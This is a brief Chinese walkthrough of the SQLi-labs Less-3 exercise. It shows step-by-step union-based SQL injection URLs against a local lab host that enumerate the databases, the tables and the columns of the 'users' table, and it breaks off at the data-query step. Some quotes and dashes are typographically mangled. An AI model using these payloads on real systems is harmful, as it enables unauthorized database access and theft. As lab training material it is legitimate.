SQL-Lib_Less3
查看代码
可以看到使用的是括号闭合
![]()
用 ) 闭合:?id=1′) –-+
爆破字段长度
http://192.168.72.179/sqli-labs/Less-3/?id=1') order by 3–+
http://192.168.72.179/sqli-labs/Less-3/?id=1') order by 4–+
![]()
联合查询找到字段输出的位置
- http://192.168.72.179/sqli-labs/Less-3/?id=-1%27)%20union%20select%201,2,3%20–+ union select 1,2,3 –+)
爆破数据库,找到security数据库
- http://192.168.72.179/sqli-labs/Less-3/?id=-1') union select 1,2,group_concat(schema_name) from information_schema.schemata –+
查询数据库中的表
- http://192.168.72.179/sqli-labs/Less-3/?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=”security” –+
查询security数据库中的users表中的字段
- http://192.168.72.179/sqli-labs/Less-3/?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=”security” and table_name =”users” –+
查询数据
